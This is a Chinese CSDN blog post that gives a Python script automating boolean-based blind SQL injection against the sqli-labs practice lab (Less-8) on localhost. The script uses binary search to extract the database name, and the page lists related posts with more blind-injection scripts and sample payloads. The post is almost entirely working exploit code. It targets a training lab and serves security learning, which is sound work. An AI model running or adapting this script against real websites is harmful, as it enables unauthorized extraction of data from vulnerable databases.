python自动化实现布尔盲注

最新推荐文章于 2025-08-25 22:33:19 发布
最新推荐文章于 2025-08-25 22:33:19 发布
阅读量109 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: python 自动化 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zj2062826469/article/details/149406445 
import requests

# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"

# 要推断的数据库信息(例如:数据库名)
database_name = ""

# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "

# 计算字符集的ASCII范围
min_ascii = min(ord(c) for c in charset)
max_ascii = max(ord(c) for c in charset)


# 推断数据库名的长度
def get_database_length():
    length = 0
    while True:
        length += 1
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            return length
        if length > 50:  # 防止无限循环
            break
    return 0


# 使用二分查找推断数据库名
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        low = min_ascii
        high = max_ascii
        char_found = False

        # 二分查找当前字符的ASCII值
        while low <= high:
            mid = (low + high) // 2

            # 检查当前字符是否小于等于mid
            payload_le = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) <= {mid}) -- "
            response_le = requests.get(url, params={"id": payload_le})

            if "You are in" in response_le.text:
                # 检查是否等于mid
                payload_eq = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) = {mid}) -- "
                response_eq = requests.get(url, params={"id": payload_eq})

                if "You are in" in response_eq.text:
                    db_name += chr(mid)
                    char_found = True
                    break
                high = mid - 1  # 不大于mid,缩小上限
            else:
                low = mid + 1  # 大于mid,提高下限

        if not char_found:
            db_name += "?"  # 未找到字符时的占位符

    return db_name


# 主函数
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")

zj2062826469
关注
python自动化实现布尔盲注(二分查找)--sqli靶场
blockrock的博客
07-15 128
代码python自动化实现布尔盲注(二分查找)
Python实现自动化布尔盲注代码进行优化(二分查找)
Zwb18590712636的博客
07-17 106
代码Python实现自动化布尔盲注代码进行优化(二分查找)
python实现自动化布尔盲注
2301_81601351的博客
07-16 306
代码】用python实现自动化布尔盲注
python实现自动化布尔盲注代码进行优化(二分查找)
2303_81782041的博客
07-21 105
代码python实现自动化布尔盲注代码进行优化(二分查找)
Python自动化sql入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 1336
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
布尔型Python脚本
末初 · mochu7
03-12 8000
布尔型Python脚本,功能完整,可以参考一下大致结构,如果觉得有什么写的不足的地方,请尽管留言指正,一起交流进步
python脚本之布尔盲注
ro4lsc的博客
04-21 7220
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
python脚本实现布尔盲注
04-28 1185
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,入速度等。
布尔盲注(ctfhub)
2401_82985722的博客
03-27 2349
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL入。在入语句后,不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表数据库的第1个字母开始,显1个字母,从1开始计数# limit 0,1:表从第0行开始,显1行,从0开始计数一、手动入一般顺序:爆数据库名长度。
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时入)
Pluto.的博客
12-27 3196
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
基于python布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 2149
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
实验吧web-难-认真一点!(布尔盲注之mid(),py脚本)
Sea_Sand息禅
01-11 735
也可用bp进行爆破,这里用py脚本。 打看网页输入1,显You are in,输入2,显You are not in,是个布尔入。 然后看看过滤了什么。 sql入没有过滤:--+、or sql入过滤:union select、and、order by、空格 虽然or没有被当做sql入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are n...
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1347
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
爬小红书图片软件:根据搜索关键词,采集笔记图片、正文、评论等
python死忠3016的博客
08-23 617
摘要:一款基于Python开发的小红薯笔记采集工具,支持通过关键词采集笔记图片、正文及评论等内容。
2025年09月计算机二级Python选择题每日一练——第七期
HMY71的博客
08-25 540
本期计算机二级选择题专栏聚焦字符串操作与分支结构,包含10道典型题目,涵盖字符串切片、进制转换、循环控制、复数运算等知识点。题目解析详细,如第1题字符串截取结果为'thon 编程是 '(B选项),第3题复数类型不可遍历(C选项)等。答案分析指出常见误区,如第7题break不能跳出try-except块(D错误),第9题字符串长度应使用len()而非lenstr()。本文可作为计算机二级考试的备考资料,帮助考生掌握Python基础语法要点。
Python 并发编程全面指南(多线程 多进程 进程池 线程池 协程和异步编程) 队
m0_48853274的博客
08-25 507
Python 并发编程指南:全面解析多线程、多进程与异步编程 本文系统介绍了 Python 中的并发编程技术,包括多线程、多进程、进程池、线程池以及协程与异步编程的区别。多线程适合 I/O 密集型任务但受 GIL 限制,多进程适合 CPU 密集型任务但开销较大。进程池和线程池提供了更高级的抽象,简化了并发管理。协程和异步编程则通过非阻塞方式高效处理 I/O 操作。文章通过代码例详细演了各种技术的实现方式,包括线程同步、进程间通信以及池化技术,帮助开发者根据任务类型选择最合适的并发方案。
Selenium使用指南
HUACE4600的博客
08-19 1514
前面的代码你看不懂,也没关系,我们再来叙述一下selenium工作的过程1.selenium client(python等语言编写的自动化测试脚本)初始化一个service服务,通过Webdriver启动浏览器驱动程序chromedriver.exe2.通过RemoteWebDriver向浏览器驱动程序发送HTTP请求,浏览器驱动程序解析请求,打开浏览器,并获得sessionid,如果再次对浏览器操作需携带此id。
2025年06月 Python(二级)真题解析#中国电子学会#全国青少年软件编程等级考试
最新发布
人生就是一个不断学习的过程
08-25 17
其中,remove函数删除的是原表中具体的值,pop函数按元素所在位置删除,del函数删除某一位置的元素。本题考察的是字符串的切片。阿宝将“杭州六小龙”公司的简称保存在表中,long=[‘游科互动’、’深度求索’、’云深处’、’宇树科技’、’强脑科技’、’群核科技’],要想从表中获取“宇树科技”,以下语句正确的是?他检查发现时,发现不小心将属于autumn(秋天)的节气“白露”放在了summer(夏天)的表,现在他需要将“白露”节气回归到autumn表的“处暑”元素之后,以下程序正确的是?
Python实现SQL布尔盲注
10-18
布尔盲注通常涉及构造查询,其中包含条件表达式,比如`WHERE column_name = 'value' OR 'malicious_sql'`,恶意部分`'malicious_sql'`试图影响查询结果。 举个例子,如果你有一个搜索功能,允许用户搜索用户名,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值